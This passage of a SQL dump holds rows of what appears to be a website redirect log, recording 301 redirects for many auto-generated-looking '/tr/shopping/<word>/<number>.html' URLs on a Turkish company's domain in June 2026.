00:00:00',301),(75546,'https://3s-technologies.com.tr/tr/shopping/epignathous/902191846.html',NULL,'https://3s-technologies.com.tr/shopping/epignathous/902191846.html','',1,0,'2026-06-11 07:41:39','0000-00-00 00:00:00',301),(75547,'https://3s-technologies.com.tr/tr/shopping/primitial/2609544851.html',NULL,'https://3s-technologies.com.tr/shopping/primitial/2609544851.html','',1,0,'2026-06-11 07:41:42','0000-00-00 00:00:00',301),(75548,'https://3s-technologies.com.tr/tr/shopping/dermoneural/4136122069.html',NULL,'https://3s-technologies.com.tr/shopping/dermoneural/4136122069.html','',1,0,'2026-06-11 07:41:45','0000-00-00 00:00:00',301),(75549,'https://3s-technologies.com.tr/tr/shopping/jetton/3557613320.html',NULL,'https://3s-technologies.com.tr/shopping/jetton/3557613320.html','',1,0,'2026-06-11 07:41:48','0000-00-00 00:00:00',301),(75550,'https://3s-technologies.com.tr/tr/shopping/huronian/4212786232.html',NULL,'https://3s-technologies.com.tr/shopping/huronian/4212786232.html','',1,0,'2026-06-11 07:41:51','0000-00-00 00:00:00',301),(75551,'https://3s-technologies.com.tr/tr/shopping/preestablish/4047204555.html',NULL,'https://3s-technologies.com.tr/shopping/preestablish/4047204555.html','',1,0,'2026-06-11 07:41:54','0000-00-00 00:00:00',301),(75552,'https://3s-technologies.com.tr/tr/shopping/comprehensor/1281989984.html',NULL,'https://3s-technologies.com.tr/shopping/comprehensor/1281989984.html','',1,0,'2026-06-11 07:41:57','0000-00-00 00:00:00',301),(75553,'https://3s-technologies.com.tr/tr/shopping/propendent/439973218.html',NULL,'https://3s-technologies.com.tr/shopping/propendent/439973218.html','',1,0,'2026-06-11 07:42:00','0000-00-00 00:00:00',301),(75554,'https://3s-technologies.com.tr/tr/shopping/cogenial/1573699480.html',NULL,'https://3s-technologies.com.tr/shopping/cogenial/1573699480.html','',1,0,'2026-06-11 07:42:03','0000-00-00 00:00:00',301),(75555,'https://3s-technologies.com.tr/tr/shopping/raggedly/1483618329.html',NULL,'https://3s-technologies.com.tr/shopping/raggedly/1483618329.html','',1,0,'2026-06-11 07:42:06','0000-00-00 00:00:00',301),(75556,'https://3s-technologies.com.tr/tr/shopping/luthier/3190351183.html',NULL,'https://3s-technologies.com.tr/shopping/luthier/3190351183.html','',1,0,'2026-06-11 07:42:09','0000-00-00 00:00:00',301),(75557,'https://3s-technologies.com.tr/tr/shopping/sacredly/4051312809.html',NULL,'https://3s-technologies.com.tr/shopping/sacredly/4051312809.html','',1,0,'2026-06-11 07:42:12','0000-00-00 00:00:00',301),(75558,'https://3s-technologies.com.tr/tr/shopping/snigger/3011918709.html',NULL,'https://3s-technologies.com.tr/shopping/snigger/3011918709.html','',1,0,'2026-06-11 07:42:15','0000-00-00 00:00:00',301),(75559,'https://3s-technologies.com.tr/tr/shopping/comedo/40836381.html',NULL,'https://3s-technologies.com.tr/shopping/comedo/40836381.html','',1,0,'2026-06-11 07:42:18','0000-00-00 00:00:00',301),(75560,'https://3s-technologies.com.tr/tr/shopping/aecidium/2497661715.html',NULL,'https://3s-technologies.com.tr/shopping/aecidium/2497661715.html','',1,0,'2026-06-11 07:42:21','0000-00-00 00:00:00',301),(75561,'https://3s-technologies.com.tr/tr/shopping/philosophe/3022913334.html',NULL,'https://3s-technologies.com.tr/shopping/philosophe/3022913334.html','',1,0,'2026-06-11 07:42:24','0000-00-00 00:00:00',301),(75562,'https://3s-technologies.com.tr/tr/shopping/puzzle/1126876990.html',NULL,'https://3s-technologies.com.tr/shopping/puzzle/1126876990.html','',1,0,'2026-06-11 07:42:27','0000-00-00 00:00:00',301),(75563,'https://3s-technologies.com.tr/tr/shopping/fordrive/1286742279.html',NULL,'https://3s-technologies.com.tr/shopping/fordrive/1286742279.html','',1,0,'2026-06-11 07:42:30','0000-00-00 00:00:00',301),(75564,'https://3s-technologies.com.tr/tr/shopping/dispassioned/3986076182.html',NULL,'https://3s-technologies.com.tr/shopping/dispassioned/3986076182.html','',1,0,'2026-06-11 07:42:37','0000-00-00 00:00:00',301),(75565,'https://3s-technologies.com.tr/tr/shopping/signable/4246619687.html',NULL,'https://3s-technologies.com.tr/shopping/signable/4246619687.html','',1,0,'2026-06-11 07:42:40','0000-00-00 00:00:00',301),(75566,'https://3s-technologies.com.tr/tr/shopping/valet/2339721694.html',NULL,'https://3s-technologies.com.tr/shopping/valet/2339721694.html','',1,0,'2026-06-11 07:42:43','0000-00-00 00:00:00',301),(75567,'https://3s-technologies.com.tr/tr/shopping/griff/4009395662.html',NULL,'https://3s-technologies.com.tr/shopping/griff/4009395662.html','',1,0,'2026-06-11 07:42:46','0000-00-00 00:00:00',301),(75568,'https://3s-technologies.com.tr/tr/shopping/cretose/2845692991.html',NULL,'https://3s-technologies.com.tr/shopping/cretose/2845692991.html','',1,0,'2026-06-11 07:42:49','0000-00-00 00:00:00',301),(75569,'https://3s-technologies.com.tr/tr/shopping/jellified/1481935115.html',NULL,'https://3s-technologies.com.tr/shopping/jellified/1481935115.html','',1,0,'2026-06-11 07:42:52','0000-00-00 00:00:00',301),(75570,'https://3s-technologies.com.tr/tr/shopping/milliweber/2167154814.html',NULL,'https://3s-technologies.com.tr/shopping/milliweber/2167154814.html','',1,0,'2026-06-11 07:42:55','0000-00-00 00:00:00',301),(75571,'https://3s-technologies.com.tr/tr/shopping/adynamy/2326463647.html',NULL,'https://3s-technologies.com.tr/shopping/adynamy/2326463647.html','',1,0,'2026-06-11 07:42:58','0000-00-00 00:00:00',301),(75572,'https://3s-technologies.com.tr/tr/shopping/endermatic/760238067.html',NULL,'https://3s-technologies.com.tr/shopping/endermatic/760238067.html','',1,0,'2026-06-11 07:43:01','0000-00-00 00:00:00',301),(75573,'https://3s-technologies.com.tr/tr/shopping/edema/4066793327.html',NULL,'https://3s-technologies.com.tr/shopping/edema/4066793327.html','',1,0,'2026-06-11 07:43:07','0000-00-00 00:00:00',301),(75574,'https://3s-technologies.com.tr/tr/shopping/diamonded/1939826762.html',NULL,'https://3s-technologies.com.tr/shopping/diamonded/1939826762.html','',1,0,'2026-06-11 07:43:10','0000-00-00 00:00:00',301),(75575,'https://3s-technologies.com.tr/tr/shopping/melezitose/1344114375.html',NULL,'https://3s-technologies.com.tr/shopping/melezitose/1344114375.html','',1,0,'2026-06-11 07:43:13','0000-00-00 00:00:00',301),(75576,'https://3s-technologies.com.tr/tr/shopping/greedy/2665762379.html',NULL,'https://3s-technologies.com.tr/shopping/greedy/2665762379.html','',1,0,'2026-06-11 07:43:16','0000-00-00 00:00:00',301),(75577,'https://3s-technologies.com.tr/tr/shopping/sackful/4027938041.html',NULL,'https://3s-technologies.com.tr/shopping/sackful/4027938041.html','',1,0,'2026-06-11 07:43:19','0000-00-00 00:00:00',301),(75578,'https://3s-technologies.com.tr/tr/shopping/manger/2445080878.html',NULL,'https://3s-technologies.com.tr/shopping/manger/2445080878.html','',1,0,'2026-06-11 07:43:22','0000-00-00 00:00:00',301),(75579,'https://3s-technologies.com.tr/tr/shopping/reengrave/2507665645.html',NULL,'https://3s-technologies.com.tr/shopping/reengrave/2507665645.html','',1,0,'2026-06-11 07:43:25','0000-00-00 00:00:00',301),(75580,'https://3s-technologies.com.tr/tr/shopping/exogyra/595082562.html',NULL,'https://3s-technologies.com.tr/shopping/exogyra/595082562.html','',1,0,'2026-06-11 07:43:28','0000-00-00 00:00:00',301),(75581,'https://3s-technologies.com.tr/tr/shopping/quirk/2025696006.html',NULL,'https://3s-technologies.com.tr/shopping/quirk/2025696006.html','',1,0,'2026-06-11 07:43:31','0000-00-00 00:00:00',301),(75582,'https://3s-technologies.com.tr/tr/shopping/refugee/3027787373.html',NULL,'https://3s-technologies.com.tr/shopping/refugee/3027787373.html','',1,0,'2026-06-11 07:43:34','0000-00-00 00:00:00',301),(75583,'https://3s-technologies.com.tr/tr/shopping/slacked/3939542869.html',NULL,'https://3s-technologies.com.tr/shopping/slacked/3939542869.html','',1,0,'2026-06-11 07:43:44','0000-00-00 00:00:00',301),(75584,'https://3s-technologies.com.tr/tr/shopping/mongolian/3573914895.html',NULL,'https://3s-technologies.com.tr/shopping/mongolian/3573914895.html','',1,0,'2026-06-11 07:43:46','0000-00-00 00:00:00',301),(75585,'https://3s-technologies.com.tr/tr/shopping/mallotus/734448620.html',NULL,'https://3s-technologies.com.tr/shopping/mallotus/734448620.html','',1,0,'2026-06-11 07:43:49','0000-00-00 00:00:00',301),(75586,'https://3s-technologies.com.tr/tr/shopping/dodecagon/1714342289.html',NULL,'https://3s-technologies.com.tr/shopping/dodecagon/1714342289.html','',1,0,'2026-06-11 07:43:52','0000-00-00 00:00:00',301),(75587,'https://3s-technologies.com.tr/tr/shopping/orientalism/3591148237.html',NULL,'https://3s-technologies.com.tr/shopping/orientalism/3591148237.html','',1,0,'2026-06-11 07:43:55','0000-00-00 00:00:00',301),(75588,'https://3s-technologies.com.tr/tr/shopping/diverberate/589752790.html',NULL,'https://3s-technologies.com.tr/shopping/diverberate/589752790.html','',1,0,'2026-06-11 07:43:58','0000-00-00 00:00:00',301),(75589,'https://3s-technologies.com.tr/tr/shopping/jailed/290976749.html',NULL,'https://3s-technologies.com.tr/shopping/jailed/290976749.html','',1,0,'2026-06-11 07:44:01','0000-00-00 00:00:00',301),(75590,'https://3s-technologies.com.tr/tr/shopping/fedellini/517722704.html',NULL,'https://3s-technologies.com.tr/shopping/fedellini/517722704.html','',1,0,'2026-06-11 07:44:04','0000-00-00 00:00:00',301),(75591,'https://3s-technologies.com.tr/tr/shopping/hierarchy/117675245.html',NULL,'https://3s-technologies.com.tr/shopping/hierarchy/117675245.html','',1,0,'2026-06-11 07:44:07','0000-00-00 00:00:00',301),(75592,'https://3s-technologies.com.tr/tr/shopping/panopticon/3154778207.html',NULL,'https://3s-technologies.com.tr/shopping/panopticon/3154778207.html','',1,0,'2026-06-11 07:44:10','0000-00-00 00:00:00',301),(75593,'https://3s-technologies.com.tr/tr/shopping/alkaloids/2333973391.html',NULL,'https://3s-technologies.com.tr/shopping/alkaloids/2333973391.html','',1,0,'2026-06-11 07:44:13','0000-00-00 00:00:00',301),(75594,'https://3s-technologies.com.tr/tr/shopping/summity/1460977049.html',NULL,'https://3s-technologies.com.tr/shopping/summity/1460977049.html','',1,0,'2026-06-11 07:44:16','0000-00-00 00:00:00',301),(75595,'https://3s-technologies.com.tr/tr/shopping/bibler/1229149507.html',NULL,'https://3s-technologies.com.tr/shopping/bibler/1229149507.html','',1,0,'2026-06-11 07:44:19','0000-00-00 00:00:00',301),(75596,'https://3s-technologies.com.tr/tr/shopping/fermium/2450293899.html',NULL,'https://3s-technologies.com.tr/shopping/fermium/2450293899.html','',1,0,'2026-06-11 07:44:23','0000-00-00 00:00:00',301),(75597,'https://3s-technologies.com.tr/tr/shopping/guttiferae/2642425815.html',NULL,'https://3s-technologies.com.tr/shopping/guttiferae/2642425815.html','',1,0,'2026-06-11 07:44:26','0000-00-00 00:00:00',301),(75598,'https://3s-technologies.com.tr/tr/shopping/mediatorship/4280509433.html',NULL,'https://3s-technologies.com.tr/shopping/mediatorship/4280509433.html','',1,0,'2026-06-11 07:44:29','0000-00-00 00:00:00',301),(75599,'https://3s-technologies.com.tr/tr/shopping/misfeign/1062790931.html',NULL,'https://3s-technologies.com.tr/shopping/misfeign/1062790931.html','',1,0,'2026-06-11 07:44:32','0000-00-00 00:00:00',301),(75600,'https://3s-technologies.com.tr/tr/shopping/sedged/1204720855.html',NULL,'https://3s-technologies.com.tr/shopping/sedged/1204720855.html','',1,0,'2026-06-11 07:44:35','0000-00-00 00:00:00',301),(75601,'https://3s-technologies.com.tr/tr/shopping/creationism/2029236218.html',NULL,'https://3s-technologies.com.tr/shopping/creationism/2029236218.html','',1,0,'2026-06-11 07:44:38','0000-00-00 00:00:00',301),(75602,'https://3s-technologies.com.tr/tr/shopping/bluecoat/4275301405.html',NULL,'https://3s-technologies.com.tr/shopping/bluecoat/4275301405.html','',1,0,'2026-06-11 07:44:41','0000-00-00 00:00:00',301),(75603,'https://3s-technologies.com.tr/tr/shopping/xanthian/859173134.html',NULL,'https://3s-technologies.com.tr/shopping/xanthian/859173134.html','',1,0,'2026-06-11 07:44:44','0000-00-00 00:00:00',301),(75604,'https://3s-technologies.com.tr/tr/shopping/kerseys/1165076617.html',NULL,'https://3s-technologies.com.tr/shopping/kerseys/1165076617.html','',1,0,'2026-06-11 07:44:47','0000-00-00 00:00:00',301),(75605,'https://3s-technologies.com.tr/tr/shopping/thermometrograph/891530079.html',NULL,'https://3s-technologies.com.tr/shopping/thermometrograph/891530079.html','',1,0,'2026-06-11 07:44:50','0000-00-00 00:00:00',301),(75606,'https://3s-technologies.com.tr/tr/shopping/porotype/910097232.html',NULL,'https://3s-technologies.com.tr/shopping/porotype/910097232.html','',1,0,'2026-06-11 07:44:53','0000-00-00 00:00:00',301),(75607,'https://3s-technologies.com.tr/tr/shopping/lightening/705575754.html',NULL,'https://3s-technologies.com.tr/shopping/lightening/705575754.html','',1,0,'2026-06-11 07:44:56','0000-00-00 00:00:00',301),(75608,'https://3s-technologies.com.tr/tr/shopping/steersmen/2181629937.html',NULL,'https://3s-technologies.com.tr/shopping/steersmen/2181629937.html','',1,0,'2026-06-11 07:44:59','0000-00-00 00:00:00',301),(75609,'https://3s-technologies.com.tr/tr/shopping/dunny/1154523435.html',NULL,'https://3s-technologies.com.tr/shopping/dunny/1154523435.html','',1,0,'2026-06-11 07:45:02','0000-00-00 00:00:00',301),(75610,'https://3s-technologies.com.tr/tr/shopping/galled/1332272774.html',NULL,'https://3s-technologies.com.tr/shopping/galled/1332272774.html','',1,0,'2026-06-11 07:45:05','0000-00-00 00:00:00',301),(75611,'https://3s-technologies.com.tr/tr/shopping/awned/3201376354.html',NULL,'https://3s-technologies.com.tr/shopping/awned/3201376354.html','',1,0,'2026-06-11 07:45:08','0000-00-00 00:00:00',301),(75612,'https://3s-technologies.com.tr/tr/shopping/depilated/685934414.html',NULL,'https://3s-technologies.com.tr/shopping/depilated/685934414.html','',1,0,'2026-06-11 07:45:11','0000-00-00 00:00:00',301),(75613,'https://3s-technologies.com.tr/tr/shopping/auszug/404014103.html',NULL,'https://3s-technologies.com.tr/shopping/auszug/404014103.html','',1,0,'2026-06-11 07:45:14','0000-00-00 00:00:00',301),(75614,'https://3s-technologies.com.tr/tr/shopping/loculator/1667742552.html',NULL,'https://3s-technologies.com.tr/shopping/loculator/1667742552.html','',1,0,'2026-06-11 07:45:17','0000-00-00 00:00:00',301),(75615,'https://3s-technologies.com.tr/tr/shopping/speary/138230072.html',NULL,'https://3s-technologies.com.tr/shopping/speary/138230072.html','',1,0,'2026-06-11 07:45:20','0000-00-00 00:00:00',301),(75616,'https://3s-technologies.com.tr/tr/shopping/prolate/1791572804.html',NULL,'https://3s-technologies.com.tr/shopping/prolate/1791572804.html','',1,0,'2026-06-11 07:45:23','0000-00-00 00:00:00',301),(75617,'https://3s-technologies.com.tr/tr/shopping/costively/3456842940.html',NULL,'https://3s-technologies.com.tr/shopping/costively/3456842940.html','',1,0,'2026-06-11 07:45:26','0000-00-00 00:00:00',301),(75618,'https://3s-technologies.com.tr/tr/shopping/caoutchouc/413277049.html',NULL,'https://3s-technologies.com.tr/shopping/caoutchouc/413277049.html','',1,0,'2026-06-11 07:45:29','0000-00-00 00:00:00',301),(75619,'https://3s-technologies.com.tr/tr/shopping/riming/2414188870.html',NULL,'https://3s-technologies.com.tr/shopping/riming/2414188870.html','',1,0,'2026-06-11 07:45:32','0000-00-00 00:00:00',301),(75620,'https://3s-technologies.com.tr/tr/shopping/closeset/1686650144.html',NULL,'https://3s-technologies.com.tr/shopping/closeset/1686650144.html','',1,0,'2026-06-11 07:45:35','0000-00-00 00:00:00',301),(75621,'https://3s-technologies.com.tr/tr/shopping/estuance/443471603.html',NULL,'https://3s-technologies.com.tr/shopping/estuance/443471603.html','',1,0,'2026-06-11 07:45:38','0000-00-00 00:00:00',301),(75622,'https://3s-technologies.com.tr/tr/shopping/redeliverance/388307656.html',NULL,'https://3s-technologies.com.tr/shopping/redeliverance/388307656.html','',1,0,'2026-06-11 07:45:41','0000-00-00 00:00:00',301),(75623,'https://3s-technologies.com.tr/tr/shopping/internasal/3024151060.html',NULL,'https://3s-technologies.com.tr/shopping/internasal/3024151060.html','',1,0,'2026-06-11 07:45:44','0000-00-00 00:00:00',301),(75624,'https://3s-technologies.com.tr/tr/shopping/nameless/2029357930.html',NULL,'https://3s-technologies.com.tr/shopping/nameless/2029357930.html','',1,0,'2026-06-11 07:45:47','0000-00-00 00:00:00',301),(75625,'https://3s-technologies.com.tr/tr/shopping/booker/3308130864.html',NULL,'https://3s-technologies.com.tr/shopping/booker/3308130864.html','',1,0,'2026-06-11 07:45:50','0000-00-00 00:00:00',301),(75626,'https://3s-technologies.com.tr/tr/shopping/unanticipated/1490656958.html',NULL,'https://3s-technologies.com.tr/shopping/unanticipated/1490656958.html','',1,0,'2026-06-11 07:45:54','0000-00-00 00:00:00',301),(75627,'https://3s-technologies.com.tr/tr/shopping/oxanilide/890317980.html',NULL,'https://3s-technologies.com.tr/shopping/oxanilide/890317980.html','',1,0,'2026-06-11 07:46:03','0000-00-00 00:00:00',301),(75628,'https://3s-technologies.com.tr/tr/shopping/financial/3137342396.html',NULL,'https://3s-technologies.com.tr/shopping/financial/3137342396.html','',1,0,'2026-06-11 07:46:06','0000-00-00 00:00:00',301),(75629,'https://3s-technologies.com.tr/tr/shopping/surfeitwater/831223071.html',NULL,'https://3s-technologies.com.tr/shopping/surfeitwater/831223071.html','',1,0,'2026-06-11 07:46:09','0000-00-00 00:00:00',301),(75630,'https://3s-technologies.com.tr/tr/shopping/adviso/1851759848.html',NULL,'https://3s-technologies.com.tr/shopping/adviso/1851759848.html','',1,0,'2026-06-11 07:46:12','0000-00-00 00:00:00',301),(75631,'https://3s-technologies.com.tr/tr/shopping/lucre/2728459909.html',NULL,'https://3s-technologies.com.tr/shopping/lucre/2728459909.html','',1,0,'2026-06-11 07:46:15','0000-00-00 00:00:00',301),(75632,'https://3s-technologies.com.tr/tr/shopping/thoracic/3970662088.html',NULL,'https://3s-technologies.com.tr/shopping/thoracic/3970662088.html','',1,0,'2026-06-11 07:46:18','0000-00-00 00:00:00',301),(75633,'https://3s-technologies.com.tr/tr/shopping/convenience/471118064.html',NULL,'https://3s-technologies.com.tr/shopping/convenience/471118064.html','',1,0,'2026-06-11 07:46:21','0000-00-00 00:00:00',301),(75634,'https://3s-technologies.com.tr/tr/shopping/preexist/2980230577.html',NULL,'https://3s-technologies.com.tr/shopping/preexist/2980230577.html','',1,0,'2026-06-11 07:46:24','0000-00-00 00:00:00',301),(75635,'https://3s-technologies.com.tr/tr/shopping/volleyed/2801679988.html',NULL,'https://3s-technologies.com.tr/shopping/volleyed/2801679988.html','',1,0,'2026-06-11 07:46:27','0000-00-00 00:00:00',301),(75636,'https://3s-technologies.com.tr/tr/shopping/bandle/2950387145.html',NULL,'https://3s-technologies.com.tr/shopping/bandle/2950387145.html','',1,0,'2026-06-11 07:46:30','0000-00-00 00:00:00',301),(75637,'https://3s-technologies.com.tr/tr/shopping/fodiens/3095931813.html',NULL,'https://3s-technologies.com.tr/shopping/fodiens/3095931813.html','',1,0,'2026-06-11 07:46:33','0000-00-00 00:00:00',301),(75638,'https://3s-technologies.com.tr/tr/shopping/mandelic/1786502672.html',NULL,'https://3s-technologies.com.tr/shopping/mandelic/1786502672.html','',1,0,'2026-06-11 07:46:36','0000-00-00 00:00:00',301),(75639,'https://3s-technologies.com.tr/tr/shopping/concentrative/2630876641.html',NULL,'https://3s-technologies.com.tr/shopping/concentrative/2630876641.html','',1,0,'2026-06-11 07:46:39','0000-00-00 00:00:00',301),(75640,'https://3s-technologies.com.tr/tr/shopping/usnic/3796245892.html',NULL,'https://3s-technologies.com.tr/shopping/usnic/3796245892.html','',1,0,'2026-06-11 07:46:42','0000-00-00 00:00:00',301),(75641,'https://3s-technologies.com.tr/tr/shopping/paedogenetic/4148883416.html',NULL,'https://3s-technologies.com.tr/shopping/paedogenetic/4148883416.html','',1,0,'2026-06-11 07:46:45','0000-00-00 00:00:00',301),(75642,'https://3s-technologies.com.tr/tr/shopping/unteam/87045044.html',NULL,'https://3s-technologies.com.tr/shopping/unteam/87045044.html','',1,0,'2026-06-11 07:46:53','0000-00-00 00:00:00',301),(75643,'https://3s-technologies.com.tr/tr/shopping/gyrostatics/3357493908.html',NULL,'https://3s-technologies.com.tr/shopping/gyrostatics/3357493908.html','',1,0,'2026-06-11 07:46:55','0000-00-00 00:00:00',301),(75644,'https://3s-technologies.com.tr/tr/shopping/imparadised/1350078801.html',NULL,'https://3s-technologies.com.tr/shopping/imparadised/1350078801.html','',1,0,'2026-06-11 07:46:58','0000-00-00 00:00:00',301),(75645,'https://3s-technologies.com.tr/tr/shopping/mordant/3233663656.html',NULL,'https://3s-technologies.com.tr/shopping/mordant/3233663656.html','',1,0,'2026-06-11 07:47:01','0000-00-00 00:00:00',301),(75646,'https://3s-technologies.com.tr/tr/shopping/interserted/1529512212.html',NULL,'https://3s-technologies.com.tr/shopping/interserted/1529512212.html','',1,0,'2026-06-11 07:47:04','0000-00-00 00:00:00',301),(75647,'https://3s-technologies.com.tr/tr/shopping/indies/2451050249.html',NULL,'https://3s-technologies.com.tr/shopping/indies/2451050249.html','',1,0,'2026-06-11 07:47:07','0000-00-00 00:00:00',301),(75648,'https://3s-technologies.com.tr/tr/shopping/ridotto/3420014000.html',NULL,'https://3s-technologies.com.tr/shopping/ridotto/3420014000.html','',1,0,'2026-06-11 07:47:10','0000-00-00 00:00:00',301),(75649,'https://3s-technologies.com.tr/tr/shopping/carburized/3012040421.html',NULL,'https://3s-technologies.com.tr/shopping/carburized/3012040421.html','',1,0,'2026-06-11 07:47:13','0000-00-00 00:00:00',301),(75650,'https://3s-technologies.com.tr/tr/shopping/playwriter/1614607150.html',NULL,'https://3s-technologies.com.tr/shopping/playwriter/1614607150.html','',1,0,'2026-06-11 07:47:16','0000-00-00 00:00:00',301),(75651,'https://3s-technologies.com.tr/tr/shopping/fanatism/3216561899.html',NULL,'https://3s-technologies.com.tr/shopping/fanatism/3216561899.html','',1,0,'2026-06-11 07:47:19','0000-00-00 00:00:00',301),(75652,'https://3s-technologies.com.tr/tr/shopping/perseus/2507046373.html',NULL,'https://3s-technologies.com.tr/shopping/perseus/2507046373.html','',1,0,'2026-06-11 07:47:22','0000-00-00 00:00:00',301),(75653,'https://3s-technologies.com.tr/tr/shopping/overcover/2824477994.html',NULL,'https://3s-technologies.com.tr/shopping/overcover/2824477994.html','',1,0,'2026-06-11 07:47:25','0000-00-00 00:00:00',301),(75654,'https://3s-technologies.com.tr/tr/shopping/essentiate/711540164.html',NULL,'https://3s-technologies.com.tr/shopping/essentiate/711540164.html','',1,0,'2026-06-11 07:47:28','0000-00-00 00:00:00',301),(75655,'https://3s-technologies.com.tr/tr/shopping/azotemia/3138458394.html',NULL,'https://3s-technologies.com.tr/shopping/azotemia/3138458394.html','',1,0,'2026-06-11 07:47:31','0000-00-00 00:00:00',301),(75656,'https://3s-technologies.com.tr/tr/shopping/epidermic/2436119409.html',NULL,'https://3s-technologies.com.tr/shopping/epidermic/2436119409.html','',1,0,'2026-06-11 07:47:34','0000-00-00 00:00:00',301),(75657,'https://3s-technologies.com.tr/tr/shopping/subaerial/1413040304.html',NULL,'https://3s-technologies.com.tr/shopping/subaerial/1413040304.html','',1,0,'2026-06-11 07:47:37','0000-00-00 00:00:00',301),(75658,'https://3s-technologies.com.tr/tr/shopping/tallboy/2239001667.html',NULL,'https://3s-technologies.com.tr/shopping/tallboy/2239001667.html','',1,0,'2026-06-11 07:47:40','0000-00-00 00:00:00',301),(75659,'https://3s-technologies.com.tr/tr/shopping/wagtail/2624123263.html',NULL,'https://3s-technologies.com.tr/shopping/wagtail/2624123263.html','',1,0,'2026-06-11 07:47:43','0000-00-00 00:00:00',301),(75660,'https://3s-technologies.com.tr/tr/shopping/tillot/528885813.html',NULL,'https://3s-technologies.com.tr/shopping/tillot/528885813.html','',1,0,'2026-06-11 07:47:46','0000-00-00 00:00:00',301),(75661,'https://3s-technologies.com.tr/tr/shopping/liquids/1579102499.html',NULL,'https://3s-technologies.com.tr/shopping/liquids/1579102499.html','',1,0,'2026-06-11 07:47:49','0000-00-00 00:00:00',301),(75662,'https://3s-technologies.com.tr/tr/shopping/yahweh/2294165630.html',NULL,'https://3s-technologies.com.tr/shopping/yahweh/2294165630.html','',1,0,'2026-06-11 07:47:52','0000-00-00 00:00:00',301),(75663,'https://3s-technologies.com.tr/tr/shopping/overgloom/929173250.html',NULL,'https://3s-technologies.com.tr/shopping/overgloom/929173250.html','',1,0,'2026-06-11 07:47:59','0000-00-00 00:00:00',301),(75664,'https://3s-technologies.com.tr/tr/shopping/vanquisher/1642860728.html',NULL,'https://3s-technologies.com.tr/shopping/vanquisher/1642860728.html','',1,0,'2026-06-11 07:48:02','0000-00-00 00:00:00',301),(75665,'https://3s-technologies.com.tr/tr/shopping/untangibility/1622736134.html',NULL,'https://3s-technologies.com.tr/shopping/untangibility/1622736134.html','',1,0,'2026-06-11 07:48:05','0000-00-00 00:00:00',301),(75666,'https://3s-technologies.com.tr/tr/shopping/promisee/567767153.html',NULL,'https://3s-technologies.com.tr/shopping/promisee/567767153.html','',1,0,'2026-06-11 07:48:08','0000-00-00 00:00:00',301),(75667,'https://3s-technologies.com.tr/tr/shopping/preinstructed/2628712035.html',NULL,'https://3s-technologies.com.tr/shopping/preinstructed/2628712035.html','',1,0,'2026-06-11 07:48:11','0000-00-00 00:00:00',301),(75668,'https://3s-technologies.com.tr/tr/shopping/uncus/1528300129.html',NULL,'https://3s-technologies.com.tr/shopping/uncus/1528300129.html','',1,0,'2026-06-11 07:48:14','0000-00-00 00:00:00',301),(75669,'https://3s-technologies.com.tr/tr/shopping/rebellion/3530765068.html',NULL,'https://3s-technologies.com.tr/shopping/rebellion/3530765068.html','',1,0,'2026-06-11 07:48:19','0000-00-00 00:00:00',301),(75670,'https://3s-technologies.com.tr/tr/shopping/anastatic/1622605051.html',NULL,'https://3s-technologies.com.tr/shopping/anastatic/1622605051.html','',1,0,'2026-06-11 07:48:23','0000-00-00 00:00:00',301),(75671,'https://3s-technologies.com.tr/tr/shopping/isagelous/3134918182.html',NULL,'https://3s-technologies.com.tr/shopping/isagelous/3134918182.html','',1,0,'2026-06-11 07:48:26','0000-00-00 00:00:00',301),(75672,'https://3s-technologies.com.tr/tr/shopping/colonist/1962952343.html',NULL,'https://3s-technologies.com.tr/shopping/colonist/1962952343.html','',1,0,'2026-06-11 07:48:29','0000-00-00 00:00:00',301),(75673,'https://3s-technologies.com.tr/tr/shopping/homodynamic/3381027631.html',NULL,'https://3s-technologies.com.tr/shopping/homodynamic/3381027631.html','',1,0,'2026-06-11 07:48:32','0000-00-00 00:00:00',301),(75674,'https://3s-technologies.com.tr/tr/shopping/unmuffle/2557653956.html',NULL,'https://3s-technologies.com.tr/shopping/unmuffle/2557653956.html','',1,0,'2026-06-11 07:48:35','0000-00-00 00:00:00',301),(75675,'https://3s-technologies.com.tr/tr/shopping/oedemia/3419882885.html',NULL,'https://3s-technologies.com.tr/shopping/oedemia/3419882885.html','',1,0,'2026-06-11 07:48:38','0000-00-00 00:00:00',301),(75676,'https://3s-technologies.com.tr/tr/shopping/aminol/2685933344.html',NULL,'https://3s-technologies.com.tr/shopping/aminol/2685933344.html','',1,0,'2026-06-11 07:48:41','0000-00-00 00:00:00',301),(75677,'https://3s-technologies.com.tr/tr/shopping/imperceptible/856707109.html',NULL,'https://3s-technologies.com.tr/shopping/imperceptible/856707109.html','',1,0,'2026-06-11 07:48:44','0000-00-00 00:00:00',301),(75678,'https://3s-technologies.com.tr/tr/shopping/arborescens/2237789584.html',NULL,'https://3s-technologies.com.tr/shopping/arborescens/2237789584.html','',1,0,'2026-06-11 07:48:47','0000-00-00 00:00:00',301),(75679,'https://3s-technologies.com.tr/tr/shopping/mepacrine/1641648629.html',NULL,'https://3s-technologies.com.tr/shopping/mepacrine/1641648629.html','',1,0,'2026-06-11 07:48:50','0000-00-00 00:00:00',301),(75680,'https://3s-technologies.com.tr/tr/shopping/birdwitted/3465015499.html',NULL,'https://3s-technologies.com.tr/shopping/birdwitted/3465015499.html','',1,0,'2026-06-11 07:48:53','0000-00-00 00:00:00',301),(75681,'https://3s-technologies.com.tr/tr/shopping/alkanet/1813068101.html',NULL,'https://3s-technologies.com.tr/shopping/alkanet/1813068101.html','',1,0,'2026-06-11 07:48:56','0000-00-00 00:00:00',301),(75682,'https://3s-technologies.com.tr/tr/shopping/mastives/2621699049.html',NULL,'https://3s-technologies.com.tr/shopping/mastives/2621699049.html','',1,0,'2026-06-11 07:49:03','0000-00-00 00:00:00',301),(75683,'https://3s-technologies.com.tr/tr/shopping/myriachit/1038759446.html',NULL,'https://3s-technologies.com.tr/shopping/myriachit/1038759446.html','',1,0,'2026-06-11 07:49:07','0000-00-00 00:00:00',301),(75684,'https://3s-technologies.com.tr/tr/shopping/anguillaris/761735401.html',NULL,'https://3s-technologies.com.tr/shopping/anguillaris/761735401.html','',1,0,'2026-06-11 07:49:10','0000-00-00 00:00:00',301),(75685,'https://3s-technologies.com.tr/tr/shopping/incriminatory/3500659786.html',NULL,'https://3s-technologies.com.tr/shopping/incriminatory/3500659786.html','',1,0,'2026-06-11 07:49:13','0000-00-00 00:00:00',301),(75686,'https://3s-technologies.com.tr/tr/shopping/disconducive/2596380733.html',NULL,'https://3s-technologies.com.tr/shopping/disconducive/2596380733.html','',1,0,'2026-06-11 07:49:16','0000-00-00 